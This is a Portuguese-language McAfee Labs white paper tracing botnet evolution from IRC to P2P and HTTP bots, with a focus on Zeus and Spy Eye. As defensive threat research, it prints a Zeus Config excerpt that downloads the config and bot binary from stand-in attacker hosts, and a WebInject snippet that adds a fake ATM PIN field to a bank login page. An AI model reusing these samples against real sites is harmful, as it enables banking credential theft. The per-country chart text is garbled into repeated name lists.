A nova era das redes de bots

White Paper
A nova era das redes de bots
Por Zheng Bu, Pedro Bueno, Rahul Kashyap
e Adam Wosotowsky
McAfee Labs™
White Paper
A nova era das redes de bots
Sumário
Uma indústria se desenvolve
3
Evolução
4
Bots de IRC
4
Bots locais
4
Bots P2P
4
Bots HTTP
5
Spy Eye
7
Predomínio global
8
Classificação das redes de bots: Principais ameaças por país
9
O papel dos governos
10
Quem está em risco?
11
Uma perspectiva do futuro
11
Uma nova era de zumbis sociais?
12
Quanto mais oculto, melhor
13
Combate através da Global Threat Intelligence
14
Referências
14
Sobre o McAfee Labs™ 14
Sobre a McAfee
14
White Paper
A nova era das redes de bots
As redes de bots (robôs), popularmente conhecidas como “botnets”, têm uma história variada.
Um bot é, basicamente, uma série de scripts ou comandos, ou um programa desenvolvido para
se conectar a algo (normalmente um servidor) e executar um comando ou uma série de comandos.
Essencialmente, ele desempenha várias funções. Ele não precisa ser malicioso ou nocivo.
Os bots e seus usos evoluíram de simples observadores de canais ou jogos (por exemplo, os bots
Bartender de Wisner e Game Manager de Lindahl) para fornecedores de serviços especializados,
como gerenciamento de bancos de dados ou manutenção de listas de acesso. Este relatório aborda
um uso muito diferente: O “arrebanhamento” de bots (também chamados de “drones” ou zumbis)
por cibercriminosos para apoiar suas atividades criminosas.
Como afetam corporações, essas atividades criminosas podem incluir roubo de segredos
comerciais, inserção de malware em arquivos de código-fonte, interrupção de acesso ou de serviços,
comprometimento da integridade dos dados e roubo de informações de identidade de funcionários.
Os resultados para uma empresa podem ser desastrosos e provocar perda de lucros, de conformidade
regulatória, da confiança dos clientes, de reputação e até da própria empresa. Para organizações
governamentais, as preocupações vão ainda mais longe.
Veremos como os bots criminosos evoluíram, a indústria que apoia sua criação e distribuição e como
eles são utilizados atualmente por vários grupos cibercriminosos. Também sugerimos o rumo que os
bots tomarão no futuro próximo.
Uma indústria se desenvolve
A indústria das redes de bots apresentou uma espécie de “curva de crescimento” (embora não no bom
sentido). Nos primeiros anos deste século, os bots e as redes de bots eram criados por programadores
com um bom conhecimento de redes e protocolos, como o Internet Relay Chat (IRC). A utilização do
IRC deu início à tendência em direção ao comando e controle centralizado, frequentemente conhecido
como C&C. O SDBot, um dos primeiros e mais conhecidos bots, foi codificado em C++. (O SDBot
teve grande propagação porque seu autor publicou o código-fonte — uma prática muito incomum.)
Versões posteriores do SDBot, também conhecidas como SpyBot, começaram a explorar vulnerabilidades
de chamadas a procedimentos remotos da Microsoft; portanto, seus programadores precisavam do
conhecimento de como codificar explorações para criar tais bots. Nessa época, os bots e redes de bots
vicejavam explorando múltiplas vulnerabilidades que estavam amplamente disponíveis nas plataformas
Microsoft Windows mais comuns. Os bots que surgiram posteriormente, na última década, acumularam
as capacidades de lançar ataques de negação de serviço (DoS), fazer varredura de portas e registrar
pressionamentos de teclas, entre outras funções. Os autores desses malwares precisavam conhecer
linguagem assembly, além de bons fundamentos em redes. O RBot (2003) foi um dos primeiros a usar
esquemas/compactadores de compressão e criptografia, como UPX, Morphine e ASPack. Essas exigências
introduziram um novo nível de codificadores habilidosos que compreendiam esquemas de criptografia
e como empregar técnicas de evasão ao criar seus binários.
A essa altura, não havia mais retorno. O sucesso do RBot abriu caminho para a ampla aceitação da
criptografia e da ocultação em bots e redes de bots. Um dos principais desenvolvimentos no controle
de redes de bots foi o uso de redes ponto a ponto (“peer-to-peer” ou P2P) para comunicação pelo Sinit
(2003) e pelo Phatbot (2004). Essa manobra mudou completamente a equação da comunicação das
redes de bots. Uma das redes de bots mais sofisticadas com base em P2P surgidas posteriormente foi
a Storm Worm/Nuwar (2007), que utilizava uma arquitetura P2P descentralizada e que foi, por algum
tempo, excepcionalmente difícil de combater.
A necessidade de sofisticação na tecnologia das redes de bots é impulsionada pelas várias soluções de
segurança do mercado que combatem esses desafios. A sofisticação dos próprios bots e redes de bots
também obriga as tecnologias de segurança a evoluir, criando um relacionamento medida-contramedida
muito complexo entre os criadores de malware e os fornecedores de segurança.
É evidente que os bots e as redes de bots aumentaram muito em complexidade. Os programadores
desse tipo de malware precisam de um nível avançado de conhecimento de redes, sistemas e criptografia.
Considerando-se o volume e o nível de sofisticação das redes de bots, é altamente provável que elas
sejam criadas, não por um pequeno grupo de pessoas, mas por uma agremiação de indivíduos altamente
motivados pelo retorno financeiro de sua empreitada. A motivação é óbvia: subverter e comprometer
empreendimentos e roubar dados que tenham valor monetário.
3
White Paper
A nova era das redes de bots
Evolução
Bots de IRC
Os primeiros bots nem sempre eram maliciosos. Porém, isso é bem menos comum atualmente,
especialmente nos últimos seis anos, desde a explosão das redes de bots por volta de 2004. Antes disso,
a maioria dos bots utilizava o IRC como protocolo de controle.
O IRC foi utilizado pela primeira vez para conexão a salas de bate-papo, as quais permitiam às pessoas
trocar mensagens, o que era muito comum de 10 a 15 anos atrás. No entanto, com o advento dos
protocolos de mensagens instantâneas, como ICQ, AIM e MSN Messenger, o IRC perdeu um pouco de sua
popularidade, mas ainda é utilizado por muitos profissionais de rede e de segurança da “velha-guarda”.
Os primeiros bots foram criados para se registrarem nessas salas de bate-papo (frequentemente
chamadas de canais), assegurar que o canal permanecesse aberto, reconhecer os operadores do canal
e dar a eles o controle sobre o canal.
A estratégia mais comum consistia em criar bots que pudessem fazer varredura de uma rede e tirar
proveito de máquinas que contivessem vulnerabilidades antigas ou novas. Uma vez comprometida uma
máquina, o bot poderia conectar-se a uma sala de bate-papo (canal) específica e receber instruções
do mestre de bots, como iniciar um ataque DoS contra um site. Esse comportamento ainda se vê
atualmente, como no recente ataque W32/Vulcanbot contra sites de ativistas de direitos humanos.
Outras funções de IRC comuns são capturar imagens de tela do host, fazer download ou atualizar
um bot, etc. Alguns bots podem executar mais de 100 comandos.
Observamos um número enorme de novos bots em 2004 devido ao lançamento de vários aplicativos
de interface gráfica que permitiam aos hackers criar bots apenas apontando e clicando. Essa simplicidade
foi um avanço significativo para cibercriminosos e criadores de malware: pessoas que não sabiam
desenvolver programas e que tinham pouco conhecimento sobre protocolos de rede e sistemas operacionais
passaram a poder criar uma ampla variedade de bots simplesmente clicando com um mouse.
Bots locais
Os bots funcionam quase que exclusivamente em versões do Windows, mas versões locais também surgiram.
Utilizando a linguagem de script Perl, hackers criaram versões executadas em diversas variantes de Unix e
Linux. Os criadores foram o grupo brasileiro de hackers Atrix-Team — na ocasião, uma mera agremiação de
escritores de scripts. Devido ao formato “aberto”, ainda se veem muitas dessas versões atualmente.
Bots P2P
Redes de bots IRC da “velha-guarda” ainda são comuns, mas têm uma vulnerabilidade intrínseca:
o servidor IRC. Quando o servidor é tirado do ar, o hacker perde o controle sobre o exército de bots.
Em 2007 surgiu um novo tipo de rede de bots utilizando o protocolo P2P. Trata-se do mesmo protocolo
que muitos programas utilizam, por exemplo, para fazer download de músicas. Uma dessas redes
de bots utilizava uma implementação de criptografia com base no protocolo eDonkey. Esse malware
ganhou uma notoriedade considerável: Originalmente chamava-se W32/Nuwar, mas depois ficou
famoso como worm Storm.
O Storm continha aproximadamente 100 pontos pré-gravados como valores hash, os quais o malware
descriptografava e utilizava para verificar se havia novos arquivos para baixar. Todas as transações
eram criptografadas, portanto, apenas o próprio malware podia descriptografar e reagir à resposta.
As respostas geralmente levavam a URLs que faziam download de outros binários.
O Storm foi responsável pela grande maioria do spam durante os anos de 2007 e 2008, até ser tirado do ar.
A vantagem da abordagem P2P é sua estrutura de controle distribuída e resistente, o que a torna mais
difícil de derrubar do que uma rede de bots controlada por IRC. No entanto, esse tipo é mais difícil de
manter e disseminar devido à sua complexidade.
Ainda no final de abril, vimos mais um malware que compartilhava partes do mesmo código —
responsável por envio de spam e ataques DoS — que o Storm.
4
White Paper
A nova era das redes de bots
Bots HTTP
Dois ou três anos atrás, vimos uma mudança no controle de muitas redes de bots, de canais IRC para
sites, utilizando HTTP. Essa mudança para um protocolo comum foi uma manobra inteligente por parte
dos cibercriminosos e criadores de malware.
A evolução para HTTP começou com avanços em “kits de exploração”. Esses kits, desenvolvidos
principalmente por cibercriminosos russos, incluem Mpack, ICEPack e Fiesta. Eles podem instalar
software em máquinas remotas e controlá-las a partir de um site remoto. O cibercriminoso envia
spam ou uma mensagem instantânea com uma variedade de links para vítimas potenciais. Esses links
levam a um site com o kit de exploração instalado. Uma vez lá, o kit determina qual exploração
utilizar, dependendo do país, versão do sistema operacional, versão do navegador e até múltiplas
versões de aplicativos clientes instalados na máquina da vítima. Tudo isso ocorre dinamicamente e
sem o conhecimento da vítima. Se a exploração for bem-sucedida, ela pode instalar posteriormente
um coquetel de malwares para obter controle remoto sobre a máquina infectada.
De todas as atuais redes de bots HTTP, um caso muito especial é a Zeus (também conhecida como Zbot),
especializada em roubar credenciais bancárias. A rede Zeus consiste em um elemento cliente e um
elemento servidor. O servidor possui um construtor que ajuda o mestre de bots a criar uma variante
cliente do malware PWS-ZBot (sua identificação técnica), a qual infecta uma máquina, tornando-a parte
da rede de bots ao conectá-la a um site remoto que hospeda o servidor Zeus.
Zeus segue uma tendência interessante: tornar fácil para qualquer um criar uma versão personalizada
do malware. O kit de ferramentas Zeus é bem caro para ser comprado, mas seu autor adotou amplas
medidas para assegurar que a ferramenta seja fácil de usar, o que também facilita sua venda para
muitas pessoas, aumentando assim os lucros do autor.
O exemplo seguinte mostra o Zeus Builder na versão 1.2.x:
O painel esquerdo contém apenas duas opções: “Information” (informação) e “Builder” (construtor).
Selecionar “Information” permite saber se a máquina está infectada com o Zeus. Selecionar “Builder”
ajuda a pessoa que controla o kit de ferramentas a construir um novo bot. O kit utiliza dois arquivos
de entrada: Config e WebInjects. Embora o construtor tenha um botão para editar o arquivo Config,
o botão é apenas um atalho. Nós utilizamos o Bloco de Notas para editar o arquivo. O arquivo Config
contém os parâmetros que o bot seguirá.
5
White Paper
A nova era das redes de bots
Exemplos de Config:
…
url_config “http://www.[EndereçoIPdosMalfeitores].cn/cp/config.bin”
url_compip “http://www.[EndereçoIPdosMalfeitores].com/” 2048
encryption_key “12345654321”
;blacklist_languages 1049
end
entry “DynamicConfig”
url_loader “http://www.[EndereçoIPdeOutroMalfeitor].cn/cp/bot.exe”
…
Esse trecho de Config diz ao bot onde ele deve ir para fazer download do arquivo de configuração
e do próprio bot. Essas etapas asseguram que os controladores de bots possam atualizar seus bots
e configurações com novos recursos e novos alvos a qualquer momento. As medidas também permitem
que os mestres de bots distribuam o arquivo de configuração e o binário do bot para servidores
diferentes, incorporando a capacidade de recuperação proporcionada pela arquitetura distribuída.
O segundo arquivo para construção do bot é o WebInject. Esse arquivo especifica os alvos, ou seja,
as vítimas das quais o criador do malware ou o dono do kit de ferramentas deseja arrancar informações.
O Zeus tem a capacidade de não apenas arrancar informações da página da Web original, mas também
de inserir campos adicionais. Portanto, ele pode conseguir até mais informações, se o dono do kit de
ferramentas o desejar.
Exemplo de WebInject:
…
set_url https://www.[GrandeVítimaBancária].com/* G
data_before
<span class=”mozcloak”><input type=”password”*/></span>
data_end
data_inject
<br><strong><label for=”atmpin”>ATM PIN</label>:</strong>&nbsp;<br />
<span class=”mozcloak”><input type=”password” accesskey=”A” id=”atmpin” name=”USpass”
size=”13” maxlength=”14” style=”width:147px” tabindex=”2” /></span>
data_end
data_after
data_end
…
Esse código obtém as informações no URL de destino, o qual, neste exemplo, é de um banco. Além de
roubar o nome de usuário e a senha, o Zeus injeta um outro campo para o número PIN do caixa eletrônico.
6
White Paper
A nova era das redes de bots
Como tende a acontecer com qualquer malware bem-sucedido, o Zeus gerou várias versões do
construtor adulteradas por hackers. Muitas até vêm com “backdoors” próprios. Que ironia!
Uma versão adulterada aparece na imagem de tela seguinte:
Essa versão, chamada MultiBuilder, criou duas variantes com base na versão 1.3 do Zeus.
Recentemente vimos o Zeus pular da versão 1.3 para a 2.0, a qual agora contém um modelo de licença
bem rigoroso. O Zeus é efetivamente vinculado à máquina física do comprador utilizando uma licença de
software comercial! O canal de criação e distribuição desse malware demonstra um forte tino comercial!
Spy Eye
Spy Eye é mais um exemplo de um bot HTTP complexo. Ele tem várias semelhanças com o Zeus,
principalmente por também ser um capturador de formulários e por sua impressionante arquitetura
de controle.
Como o Zeus, o Spy Eye tem seu próprio construtor gráfico:
7
White Paper
A nova era das redes de bots
Um recurso interessante do Spy Eye é sua capacidade de “eliminar” (remover) o Zeus da máquina
que ele infecta, criando um conflito interessante dentro do mundo dos criadores de malware.
Não é a primeira vez que vemos criadores de malware brigarem entre si. Para evitar análises feitas
por seus alvos, tanto o Zeus quanto o Spy Eye oferecem a opção de utilizar uma chave de criptografia
durante o processo de construção dos bots. Nas primeiras versões do Zeus, essa chave era predefinida,
o que dava às forças de segurança uma maneira muito mais rápida de analisar e descobrir os alvos do
malware. Com esse novo recurso, os malfeitores certamente levaram a briga a um outro nível.
Predomínio global
Distribuição geral de redes de bots por país
Índia
Brasil
Rússia
Alemanha
Estados Unidos
Grã-Bretanha
Colômbia
Indonésia
Itália
Espanha
Argentina
Polônia
Paquistão
Portugal
Vietnã
Coréia do Sul
Grécia
China
Belarus
Austrália
Outros
Figura 1: O McAfee Labs detectou mais infecções por redes de bots na Índia do que em qualquer outro país —
quase 1,5 milhão. Brasil, Rússia e Alemanha também excederam um milhão de infecções detectadas.
8
White Paper
A nova era das redes de bots
Classificação das redes de bots: Principais ameaças por país
Alemanha
Asprox
Argentina
Belarus
Asprox
Bagle-CB
Bagle-CB
Bobax
Bobax
Bobax
Bobax
Cimbot
Cimbot
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail
Cutwail
Cutwail2
Cutwail2
Cutwail2
Cutwail2
DarkMailer
DarkMailer
DarkMailer
DarkMailer
Dlena
Dlena
Dlena
Dlena
Donbot
Donbot
Donbot
Donbot
Festi
Festi
Festi
Festi
Gheg
Gheg
Gheg
Gheg
Grum
Grum
Grum
Grum
Grum2
Grum2
Grum2
HelloGirl
HelloGirl
HelloGirl
Lethic
Lethic
Lethic
Maazben
Maazben
Maazben
Mega-D
Mega-D
Netsky
Netsky
Outros
Outros
RK1
RK1
RK2
RK2
HelloGirl
Lethic
Maazben
Mega-D
Netsky
Outros
RK1
RK2
Asprox
China
RK2
Reposin
Rustock
Asprox
Storm
TwitGenPhish
Xarvester
Xarvester
Xarvester
RK1
TwitGenPhish
TwitGenPhish
TwitGenPhish
Outros
Storm
Storm
Storm
Netsky
Rustock
Rustock
Rustock
Mega-D
Reposin
Reposin
Reposin
Colômbia
Asprox
Xarvester
Coréia do Sul
Asprox
Bagle-CB
Bagle-CB
Bagle-CB
Bagle-CB
Bobax
Bobax
Bobax
Bobax
Cimbot
Cimbot
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail
Cutwail
Cutwail2
Cutwail2
Cutwail2
Cutwail2
DarkMailer
DarkMailer
DarkMailer
DarkMailer
Dlena
Dlena
Dlena
Donbot
Donbot
Donbot
Festi
Festi
Festi
Gheg
Gheg
Gheg
Grum
Grum
Grum
Grum2
Grum2
Grum2
HelloGirl
HelloGirl
HelloGirl
Lethic
Lethic
Lethic
Maazben
Maazben
Maazben
Mega-D
Mega-D
Mega-D
Netsky
Netsky
Netsky
Outros
Outros
Outros
RK1
RK1
RK1
Reposin
RK2
RK2
RK2
Rustock
Reposin
Reposin
Storm
Rustock
Rustock
TwitGenPhish
Storm
Storm
Xarvester
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
Dlena
Donbot
Festi
Gheg
Grum
Grum2
HelloGirl
Lethic
Maazben
Mega-D
Netsky
Outros
RK1
RK2
Espanha
Asprox
Bagle-CB
Grum2
Brasil
Austrália
Asprox
Bagle-CB
Asprox
Estados Unidos
Asprox
Grã-Bretanha
Asprox
Reposin
Rustock
Storm
TwitGenPhish
Xarvester
Grécia
Asprox
Bagle-CB
Bagle-CB
Bagle-CB
Bagle-CB
Bobax
Bobax
Bobax
Bobax
Cimbot
Cimbot
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail
Cutwail
Cutwail2
Cutwail2
Cutwail2
Cutwail2
DarkMailer
DarkMailer
DarkMailer
DarkMailer
Dlena
Dlena
Dlena
Donbot
Donbot
Donbot
Festi
Festi
Festi
Gheg
Gheg
Gheg
Grum
Grum
Grum
Grum2
Grum2
Grum2
HelloGirl
HelloGirl
HelloGirl
Lethic
Lethic
Lethic
Maazben
Maazben
Maazben
Mega-D
Mega-D
Mega-D
Netsky
Netsky
Netsky
Outros
Outros
Outros
RK1
RK1
RK1
RK2
RK2
RK2
Reposin
Reposin
Reposin
Rustock
Rustock
Storm
Storm
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
Rustock
Storm
TwitGenPhish
Xarvester
Dlena
Donbot
Festi
Gheg
Grum
Grum2
HelloGirl
Lethic
Maazben
Mega-D
Netsky
Outros
RK1
RK2
Reposin
Rustock
Storm
TwitGenPhish
Xarvester
9
White Paper
Índia
Asprox
Indonésia
Asprox
Itália
Asprox
Paquistão
Asprox
Bagle-CB
Bagle-CB
Bagle-CB
Bagle-CB
Bobax
Bobax
Bobax
Bobax
Cimbot
Cimbot
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail
Cutwail
Cutwail2
Cutwail2
Cutwail2
Cutwail2
DarkMailer
DarkMailer
DarkMailer
DarkMailer
Dlena
Dlena
Dlena
Dlena
Donbot
Donbot
Donbot
Donbot
Festi
Festi
Festi
Festi
Gheg
Gheg
Gheg
Gheg
Grum
Grum
Grum
Grum
Grum2
Grum2
Grum2
Grum2
HelloGirl
HelloGirl
HelloGirl
HelloGirl
Lethic
Lethic
Lethic
Lethic
Maazben
Maazben
Maazben
Maazben
Mega-D
Mega-D
Mega-D
Mega-D
Netsky
Netsky
Netsky
Outros
Outros
Outros
RK1
RK1
RK1
RK2
RK2
Reposin
Reposin
Rustock
Rustock
Storm
Storm
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
RK2
Reposin
Rustock
Storm
TwitGenPhish
Xarvester
Polônia
A nova era das redes de bots
Asprox
Portugal
Asprox
Rússia
Asprox
Netsky
Outros
RK1
RK2
Reposin
Rustock
Storm
TwitGenPhish
Xarvester
Vietnã
Asprox
Bagle-CB
Bagle-CB
Bagle-CB
Bagle-CB
Bobax
Bobax
Bobax
Bobax
Cimbot
Cimbot
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail
Cutwail
Cutwail2
Cutwail2
Cutwail2
Cutwail2
DarkMailer
DarkMailer
DarkMailer
DarkMailer
Dlena
Dlena
Dlena
Dlena
Donbot
Donbot
Donbot
Donbot
Festi
Festi
Festi
Festi
Gheg
Gheg
Gheg
Gheg
Grum
Grum
Grum
Grum
Grum2
Grum2
Grum2
Grum2
HelloGirl
HelloGirl
HelloGirl
HelloGirl
Lethic
Lethic
Lethic
Lethic
Maazben
Maazben
Maazben
Maazben
Mega-D
Mega-D
Mega-D
Mega-D
Netsky
Netsky
Netsky
Netsky
Outros
Outros
Outros
Outros
RK1
RK1
RK1
RK1
RK2
RK2
RK2
RK2
Reposin
Reposin
Reposin
Reposin
Rustock
Rustock
Rustock
Rustock
Storm
Storm
Storm
Storm
TwitGenPhish
TwitGenPhish
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
Xarvester
Xarvester
Figura 2: As maiores redes de bots, por país. Rustock é, disparada, a rede de bots mais “popular” do mundo.
O papel dos governos
À medida que crescer a ameaça da guerra cibernética e aumentar o dano que ela pode causar,
provavelmente veremos as redes de bots serem utilizadas como armas em conflitos futuros.
Elas podem já ter sido empregadas.
Em nosso mundo cada vez mais tecnológico, comunicações eficazes são de suma importância
na administração de qualquer crise. A organização de recursos e sua mobilização para enfrentar
eventos de causas naturais ou humanas dependem muito da Internet, uma ferramenta essencial
para disseminação de informações para uma gama de partes interessadas e para coordenação de
suas reações. A degradação ou interrupção desse fluxo de informações pode tornar um evento ruim
ainda pior. A Internet pode se tornar mais um campo de batalha.
Eventos como o recente derramamento de óleo no Golfo do México, as explosões na Europa e no
Iraque ou as escaramuças navais entre os coreanos podem ser afetados por interrupções intencionais
dos canais de notícias ou das equipes de resposta a emergências, os quais dependem da Internet.
Redes de bots podem ser compradas ou alugadas no mercado negro e podem até ser tomadas de seus
donos e redirecionadas para novos propósitos. Sabemos que tais coisas acontecem regularmente, portanto,
seria ingenuidade não esperar que organizações governamentais ou países de todo o mundo tenham se
envolvido na aquisição de capacidades de redes de bots para necessidades ofensivas e contra-ofensivas.
Uma entidade cívica ou nacional tem bons motivos para capturar uma rede de bots de seus mestres
atuais. As redes de bots infiltram corporações, indivíduos e escritórios governamentais, bem como estações
de trabalho militares. É da maior importância que os direitos intelectuais e de privacidade dos cidadãos
e instituições do mundo todo sejam protegidos daqueles que os utilizariam ilegalmente. Assumir o
controle de uma rede de bots obriga o novo controlador a escolher uma estratégia: (a) derrubar o sistema,
10
White Paper
A nova era das redes de bots
o que poderia incapacitar as máquinas que fazem parte da rede de bots, prejudicar significativamente
a infraestrutura e, possivelmente, tornar o novo mestre responsável pelos danos causados; (b) deixar a rede
de bots ociosa até que todos os nós infectados sejam atualizados e não estejam mais sob controle ou (c)
monitorar a rede de bots para identificar e capturar o mestre de bots. Cada uma dessas etapas é controversa.
Quem está em risco?
Todos os usuários de computador correm risco porque todos navegam na mesma Internet. Existe apenas
um punhado de maneiras pelas quais os cibercriminosos podem infectar um host ou rede com seus bots
(ou com qualquer forma de software malicioso). Essas maneiras normalmente envolvem alguma forma de
engenharia social, a qual pode ser definida como “hackear” a mente humana. Os atacantes utilizam um
plano ou isca para induzir os usuários de computador a clicar em um link ou instalar um programa, o que,
em condições normais, eles não fariam. Uma das técnicas mais inteligentes e predominantes de hoje em
dia é a utilização, pelos cibercriminosos, de notícias de grande repercussão como isca em seus esquemas.
Os cibercriminosos leem as mesmas histórias que nós e sabem quantas pessoas recebem suas notícias via
on-line. Seja um link supostamente de um vídeo de um desastre atual ou o drama de alguma celebridade
popular, esses estratagemas atraem os usuários como abelhas ao mel. Com seu conhecimento sobre
o comportamento humano e sobre o que os usuários procuram on-line, esses atacantes bem poderiam
ensinar alguns truques a “marqueteiros” profissionais. Precisamos ficar cientes dos riscos da navegação
e utilização de tecnologias Web 2.0 porque os cibercriminosos usam as notícias contra nós.
Todo indivíduo precisa se precaver contra ataques em redes sociais, mas as empresas e os governos sofrem
os danos mais pesados com os ataques de redes de bots. Algumas das ameaças para as empresas são:
Fraude de cliques: visitar páginas da Web e clicar automaticamente em “banners” de anúncios para
roubar grandes somas de dinheiro das empresas de anúncios on-line.
• Ataques de negação de serviço distribuído (DDoS): saturação da largura de banda para impedir
o tráfego legítimo. Esses ataques são frequentemente realizados por concorrentes, clientes insatisfeitos
ou com objetivos políticos.
• Infiltração de sistemas de arquivos: acesso a sistemas críticos para roubar dados de clientes,
informações particulares de funcionários, segredos comerciais, finanças corporativas, etc.
• Desativação da segurança existente: ato de evitar iniciativas de limpeza ou sequestro por donos
de bots rivais.
• Spams: utilização de recursos e largura de banda de outros sistemas para enviar volumes imensos de spam.
• Infecção de código-fonte: envenenamento de toda a árvore do código-fonte através da inserção de
alterações não autorizadas e indetectáveis ou da descoberta de vulnerabilidades adicionais para explorar.
•
Os resultados desses ataques podem ser bastante graves, custando às empresas uma quantidade
significativa de tempo e mão-de-obra para limpar. Além disso, as empresas podem ter revogado seu status
de conformidade regulatória ou industrial. Responsabilidades jurídicas também são prováveis em relação
a clientes, funcionários e outros afetados pelas medidas de segurança inadequadas de uma empresa.
Para governos e proprietários de infraestruturas críticas, os danos causados por redes de bots podem
ser ainda mais amplos:
• Ataques
DoS podem interromper comunicações durante uma crise.
Infecções de código-fonte podem causar a paralisação de redes críticas.
• Sistemas críticos de acesso podem fornecer informações militares aos inimigos.
•
Uma perspectiva do futuro
Nos últimos seis anos, as redes de bots tornaram-se uma das maiores ameaças, não apenas para
profissionais de cibersegurança, mas também para usuários corporativos e consumidores — praticamente
qualquer um que tenha um computador. As redes de bots tornaram-se a infraestrutura mais essencial
utilizada por cibercriminosos e governos para lançar quase todo tipo de ataque cibernético: espionagem,
roubo ou vazamento de dados, spam e ataques de negação de serviço distribuído.
O McAfee Labs já percebeu uma tendência significativa em direção a uma infraestrutura de rede de bots
mais resistente e mais distribuída — contando com tecnologias robustas, como P2P, controle com base
na Web e serviços Web 2.0, bem como técnicas de evasão e redundância.
11
White Paper
A nova era das redes de bots
Uma nova era de zumbis sociais?
Conforme os serviços Web 2.0 evoluem, o mesmo acontece com os criadores das redes de bots,
que rapidamente adotam novas tecnologias para aumentar a sofisticação de seus ataques.
Quando este documento estava sendo redigido, KeriosC2 era uma ferramenta conceitual para
demonstrar que LinkedIn, Twitter e TinyURL podem ser utilizados para controlar uma rede de bots.
Usuários de computador do mundo inteiro desfrutam da engenharia social, e agora, as redes de
bots também. Isso não é um bom desdobramento.
Com a tendência das redes de bots de funcionar por cima de aplicativos e protocolos comuns, suas
comunicações serão um desafio maior do que nunca para se detectar e prever.
Um desdobramento adicional ocorreu em maio, quando alguns bots começaram a usar o Twitter para
receber comandos. Por enquanto, a funcionalidade é bastante simples: apenas um monitoramento
(ou “seguimento”) de uma conta do Twitter para receber comandos. Como você pode ver na tela
seguinte, o construtor com interface gráfica é bastante simples.
Ao contrário do Zeus ou do Spy Eye, bem mais complexos, essa forma não contém opção alguma, apenas
um campo para se digitar um nome de usuário do Twitter, o qual o bot seguirá para receber comandos.
Durante a redação deste documento, a sintaxe e a estrutura dos comandos também eram básicas:
.VISIT: Para abrir uma página específica
.DOWNLOAD: Para fazer download de um arquivo de um local remoto
.DDOS: Para causar uma negação de serviço em uma vítima
12
White Paper
A nova era das redes de bots
Quanto mais oculto, melhor
Os criadores de redes de bots adotaram muitas abordagens para evitar detecções por dispositivos
ou softwares de segurança. No que se refere ao processo, os criadores de malware costumam testar
seu malware com a maioria dos produtos dos principais fornecedores de segurança para assegurar
que haja pouca ou nenhuma detecção. Como resultado, os cibercriminosos e criadores de malware
frequentemente anunciam seu malware como “à prova de detecção”.
O cumprimento de políticas com base em IP ou listas de controle de acesso pode ser um controle eficaz
contra conexões originárias de um bot para seus servidores de controle. Os criadores de malware e redes
de bots reagiram a esse contra-ataque implementando algoritmos de fluxo em vez de utilizar listas de IP
predefinidas para seus servidores de comando. O Zeus utiliza essa técnica para gerar domínios na hora.
Essa etapa pode, efetivamente, inviabilizar os vários mecanismos tradicionais de detecção com base em
listas negras.
Os malfeitores desenvolveram muitas técnicas de evasão para downloads inadvertidos evadirem
inspeções por dispositivos de segurança de rede. Um bom exemplo é a manipulação de extensões de
arquivo demonstrada pelo construtor Gh0st RAT. (Veja a tela seguinte). A Operação Aurora e outras
novas ameaças de malware utilizaram truques semelhantes. Vimos muitos outros tipos de evasão —
de simples codificação a criptografia (até mesmo operações XOR no binário) — no empenho dos
criadores de malware de conseguir instalar seu software na máquina da vítima.
Nos últimos anos, várias redes de bots grandes foram tiradas do ar. Para evitar esses êxitos da segurança e
tornar a infraestrutura de suas redes de bots mais forte e mais resistente, os mestres de bots começaram
a introduzir técnicas novas. Já vimos técnicas de fluxo para aumentar a capacidade de recuperação dos
servidores de controle. O protocolo P2P, embora de suporte e implementação caros, foi utilizado em um
bom número de redes de bots ocultas, como Storm e Nugache. Protocolos da Web, criptografados ou não,
são amplamente utilizados como alternativa de comando ao protocolo IRC, mais frequentemente utilizado,
principalmente porque essas portas Web são quase universalmente permitidas por firewalls, mesmo em
redes corporativas rigidamente controladas.
O McAfee Labs prevê que tanto cibercriminosos quanto criadores de redes de bots continuem a ir além
dos limites das tecnologias Web 2.0. Alguns outros avanços que prevemos:
• Acesso
e funcionalidade com vários navegadores, muito além de Internet Explorer e Firefox.
Maior integração incorporada com tecnologias de mensagens instantâneas, como JabberZeuS,
para proporcionar acesso rápido a dados bancários e outros.
• Integração adicional com outros malwares, como Bredolad e Pushdo, para assegurar um maior
predomínio global em sistemas.
•
13
White Paper
A nova era das redes de bots
Combate através da Global Threat Intelligence
Como as ameaças cibernéticas crescem exponencialmente enquanto se tornam cada vez mais sofisticadas,
os profissionais de segurança precisam de uma abordagem diferente para detectar e frustrar os ataques.
No passado, bastava uma estratégia de defesa em profundidade — camadas de tecnologias semelhantes.
A abordagem atual, porém, precisa cotejar informações de ameaças correlacionadas do mundo todo
e entre todos os vetores de ameaças. Essa inteligência precisa ser fornecida a uma ampla gama de
produtos de segurança, permitindo que esses produtos cumpram políticas locais com base na atividade
de ameaças mais recente e compartilhem informações para que toda a infraestrutura de segurança
funcione harmoniosamente.
A McAfee está escrevendo o próximo capítulo da defesa em profundidade com a Global Threat
Intelligence, nosso mecanismo “in the cloud” (computação na nuvem) que coleta e correlaciona
dados de ameaças de todos os vetores de ameaças, constrói um modelo completo de ameaças
e proporciona proteção no mercado através de uma suíte completa de produtos de segurança.
Nossa capacidade “in the cloud” (computação na nuvem) funciona em conjunto com os mecanismos
de cumprimento com base em políticas e mecanismos locais dos produtos McAfee para proporcionar
a proteção mais robusta e abrangente contra ameaças do mercado. Nossos clientes se beneficiam de
produtos de segurança da McAfee que não apenas compartilham inteligência, mas que o fazem de
uma maneira significativa e contextualizada em seu papel e posicionamento na rede.
Referências
Made, Trends Observed” (Progresso feito, tendências observadas), Microsoft Antimalware
Team. http://download.microsoft.com/download/5/6/d/56d20350-afc8-4051-a0df-677b28298912/
msrt%20-%20progress%20made%20lessons%20learned.pdf
• SecureWorks. http://www.secureworks.com/
• Documentos técnicos do McAfee Labs. http://www.mcafee.com/us/threat_center/white_paper.html
• “Progress
Sobre o McAfee Labs™
McAfee Labs é o grupo de pesquisa global da McAfee, Inc. Com a única organização de pesquisa
dedicada a todos os vetores de ataque — malware, Web, e-mail, redes e vulnerabilidades — o McAfee
Labs reúne informações de seus milhões de sensores e de suas tecnologias de reputação com base
em “cloud computing”, como McAfee Artemis™ e McAfee TrustedSource™. Os 350 pesquisadores
